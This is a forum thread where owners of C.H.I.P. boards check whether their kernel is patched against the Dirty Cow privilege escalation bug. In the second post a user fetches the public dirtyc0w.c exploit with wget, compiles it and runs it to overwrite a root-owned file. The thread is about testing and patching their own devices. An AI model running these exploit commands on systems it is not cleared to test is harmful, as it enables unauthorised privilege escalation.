Dirty Cow patched yet?


#1

I just installed the following packages on a CHIP when I ran an update, is this CHIP susceptible to the Dirty Cow bug or not?

chip-mali-modules-4.4.13-ntc-mlc chip-mconfigs linux-image-4.4.13-ntc-mlc rtl8723bs-mp-driver-modules-4.4.13-ntc-mlc


#2

I just checked the dirty cow bug and it is not resolved in the newest OS. I will have to do the patch then.

chip@chip1:~$ cat /proc/version
Linux version 4.4.13-ntc-mlc (bamboo@ip-172-31-30-80) (gcc version 5.2.1 20151010 (Ubuntu 5.2.1-22ubuntu1) ) #1 SMP Thu Nov 3 01:28:54 UTC 2016
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -lpthread dirtyc0w.c -o dirtyc0w
sudo bash
echo this is not a test > foo
exit
./dirtyc0w foo m00000000000000000
chip@chip1:~$cat foo
m00000000000000000

https://bbs.nextthing.co/t/patch-for-linux-exploit-dirty-cow/11028/2?u=danjperron

In reality you need to be connected has user on the chip for dirty cow. In my point of view I don’t thing it is a big issue for C.H.I.P. because if a hacker got user access on your C.H.I.P. he will use “sudo bash” instead. So change the default password!!! Very important!!!


#3

Thanks. Yeah I change the root and user passwords as a matter of course only my NTC Chip’s and Raspberry Pi’s. Just a shame that nextthing co is putting out kernel updates that DON’T yet have an update for Dirty Cow.


#4

If you do

sudo apt-get update
sudo apt-get upgrade

You will get the new kernel, which is the same version, but with the dirty cow patched.

https://bbs.nextthing.co/t/new-kernel-live-in-apt-repos-flashable-images-also-online/12963


#5

What I could see this line appear before (Nov 3):
$ uname -a
Linux chip 4.4.13-ntc-mlc #1 SMP Thu Nov 3 01:28:54 UTC 2016 armv7l GNU/Linux

And now (Dec 6):
$ uname -a
Linux chip 4.4.13-ntc-mlc #1 SMP Tue Dec 6 21:38:00 UTC 2016 armv7l GNU/Linux


[Solved] systemd-udevd high cpu load
How to check CHIP version?
CHIP crashes and switches off randomly, and every time after SCP to other devices
#6

Yeah, I getting the same output since the 6th as well for uname -a

Linux chip 4.4.13-ntc-mlc #1 SMP Tue Dec 6 21:38:00 UTC 2016 armv7l GNU/Linux

Is this the one that is supposed to be patched for Dirty Cow?


#7

Try your self:
https://www.redpacketsecurity.com/testing-dirty-cow-cve-2016-5195/


#8

@patrikg

you should have checked the post 4 days ago.

I did test it and it is patched!


#9

Thanks, looks like I’m good as well. Didn’t know about the mentioned post from 4 days ago.